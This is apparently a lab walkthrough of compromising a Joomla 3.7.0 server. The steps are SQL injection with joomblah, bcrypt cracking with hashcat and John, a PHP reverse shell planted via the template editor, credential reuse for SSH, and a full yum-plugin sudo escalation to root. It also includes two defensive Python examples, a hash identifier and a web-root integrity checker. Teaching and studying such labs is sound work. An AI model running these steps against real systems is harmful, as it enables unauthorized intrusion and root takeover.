Reconnaissance
As always, the first step is reconnaissance, starting with port scanning.
Ports Scanning
During this step we identify the target and find out which services sit behind the IP address.
nmap -sC -sV -oA nmap -Pn 10.10.88.15
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
| 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql syn-ack ttl 63 MariaDB (unauthorized)
Enumerating Port 80
We can start by looking at the web server. When we open the URL we see that the site runs the Joomla CMS.
Enumerating Joomla Using Joomscan
perl joomscan.pl -u http://10.10.97.153
We know the version is “Joomla 3.7.0” by running joomscan. We can also find the version by reading README.txt.
Searchsploit
This Joomla 3.7 version is vulnerable to SQL injection.
Exploit-DB
Joomla! 3.7.0 - ‘com_fields’ SQL Injection
Let’s exploit it using SQLMap
While doing a Google search I stumbled upon a script, Joomblah.
python joomblah.py http://10.10.97.153
Running the script returned a username, jonah, and a password hash.
Let's identify the hash type using the hashid tool.
hashid hash.txt
Cracking bcrypt Hash
Hashcat
Let's crack the bcrypt hash using hashcat with mode 3200 (bcrypt).
hashcat -m 3200 -a0 --force hash.txt /usr/share/wordlists/rockyou.txt
Cracking the hash took a while; alternatively, you can use John.
John
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
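The two steps above, identifying the hash format with hashid and then waiting a long time for hashcat, are connected: the bcrypt cost factor in the hash itself is what makes cracking slow. The following added example (not from the original writeup, and not hashid or hashcat code) does the same format check hashid performs for a few common formats, maps the result to the hashcat mode, and reads the cost out of a bcrypt hash to show how much work each guess costs. The sample bcrypt string is constructed to have the right shape (the $2y$ prefix PHP's password_hash produces, cost 10, 53 characters of salt and digest) and is not a real hash of any password.

```python
import re

# Format table for common hash types (the kind of check hashid performs).
# Order matters: modular-crypt formats are tested before bare hex digests.
HASH_PATTERNS = [
    ("bcrypt",      re.compile(r"^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("sha512crypt", re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("md5crypt",    re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("sha256",      re.compile(r"^[0-9a-fA-F]{64}$")),
    ("sha1",        re.compile(r"^[0-9a-fA-F]{40}$")),
    ("md5",         re.compile(r"^[0-9a-fA-F]{32}$")),
]

# Standard hashcat -m numbers for the formats above.
HASHCAT_MODES = {"md5": 0, "sha1": 100, "md5crypt": 500,
                 "sha256": 1400, "sha512crypt": 1800, "bcrypt": 3200}

# Constructed sample: valid bcrypt layout, cost 10, NOT a hash of any real password.
SAMPLE_BCRYPT = "$2y$10$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"


def identify(h):
    """Return the first matching format name, or None if nothing matches."""
    h = h.strip()
    for name, pattern in HASH_PATTERNS:
        if pattern.match(h):
            return name
    return None


def hashcat_mode(kind):
    """hashcat -m value for a format name from identify()."""
    return HASHCAT_MODES.get(kind)


def bcrypt_cost(h):
    """The cost parameter between the second and third '$' of a bcrypt hash."""
    m = re.match(r"^\$2[abxy]\$(\d{2})\$", h.strip())
    if not m:
        raise ValueError("not a bcrypt hash")
    return int(m.group(1))


def bcrypt_rounds(h):
    """bcrypt runs 2**cost key-setup rounds per guess; this is why -m 3200 is slow."""
    return 2 ** bcrypt_cost(h)


def relative_work(h, reference_cost=5):
    """How many times more expensive one guess is than at a reference cost."""
    return 2 ** (bcrypt_cost(h) - reference_cost)


if __name__ == "__main__":
    kind = identify(SAMPLE_BCRYPT)
    print(kind, "-> hashcat -m", hashcat_mode(kind))
    print("cost", bcrypt_cost(SAMPLE_BCRYPT), "=", bcrypt_rounds(SAMPLE_BCRYPT),
          "rounds per guess,", relative_work(SAMPLE_BCRYPT), "x a cost-5 hash")
```

From the defensive side the cost factor is the knob: every increment doubles the work per guess for the attacker while adding only one login's worth of delay for the user, so a stored hash at cost 10 already turns a wordlist run that would take seconds against MD5 into the long wait described above.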
Once you're done cracking the hash and have the credential, log in at http://IP/administrator using jonah and the password you found.
Exploitation
Now we have to get a reverse shell to get low-privilege access to the machine.
Go to Templates > New File
Paste the contents of php-reverse-shell.php into shell.php, the file we just created in the Joomla template.
Now, if you access the URL via http://IP/templates/protostar/shell.php you’ll get a reverse shell.
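Seen from the defender's side, what the Templates editor did here is write a new PHP file into the web root, which a file-integrity baseline catches immediately. The following added example (not part of the original writeup, and not a Joomla feature) takes a SHA-256 snapshot of a web root, diffs it against a later snapshot, and flags added or modified files with server-side script extensions. The demo builds a constructed, throwaway directory tree that stands in for /var/www/html; the file names mirror the ones on this page, and the file contents are placeholders.

```python
import hashlib
import os
import tempfile

# Extensions the web server would execute as code; an unexpected new file
# with one of these is the signal we care about.
WEB_SCRIPT_EXTS = (".php", ".phtml", ".phar")


def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = file_sha256(full)
    return result


def diff_snapshots(baseline, current):
    """Added, removed and content-changed paths between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def suspicious_changes(diff):
    """Added or modified files the web server would run as code."""
    return [p for p in diff["added"] + diff["modified"]
            if p.lower().endswith(WEB_SCRIPT_EXTS)]


def demo():
    """Constructed scenario: clean web root, then a new PHP file under the template dir."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "templates", "protostar")
        os.makedirs(tpl)
        with open(os.path.join(tpl, "index.php"), "w") as f:
            f.write("<?php // constructed placeholder template file\n")
        with open(os.path.join(root, "configuration.php"), "w") as f:
            f.write("<?php // constructed placeholder config\n")
        baseline = snapshot(root)  # taken right after deployment

        # Stand-in for the file the Templates editor wrote on the box
        with open(os.path.join(tpl, "shell.php"), "w") as f:
            f.write("<?php // constructed placeholder, not a real payload\n")

        diff = diff_snapshots(baseline, snapshot(root))
        return diff, suspicious_changes(diff)


if __name__ == "__main__":
    diff, flagged = demo()
    print("added:", diff["added"])
    print("flagged:", flagged)
```

In practice the baseline is stored outside the web root (or on another host) and the comparison runs on a schedule; dedicated tools such as AIDE do the same job with a signed database. The other half of the mitigation is not giving the Joomla administrator account write access to template files at all, so that an admin login cannot be turned into code execution this easily.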
We got 'Permission Denied' while accessing jjameson's home directory.
Let’s find credentials for this user.
After doing some digging I came across a configuration.php file inside /var/www/html.
configuration.php usually holds the database settings, including the database username, password and database name.
Luckily the password we found inside configuration.php is reused for the jjameson account, so we can log in with 'ssh jjameson'.
Privilege Escalation
Once we’re in the machine let’s escalate our privilege to root.
The first thing to check is sudo -l, to see whether our user has any special sudo permissions.
(ALL) NOPASSWD: /usr/bin/yum
After a quick search, I found a GTFOBins entry for becoming root by running some commands with yum.
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2#
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# wc -c /root/root.txt
33 /root/root.txt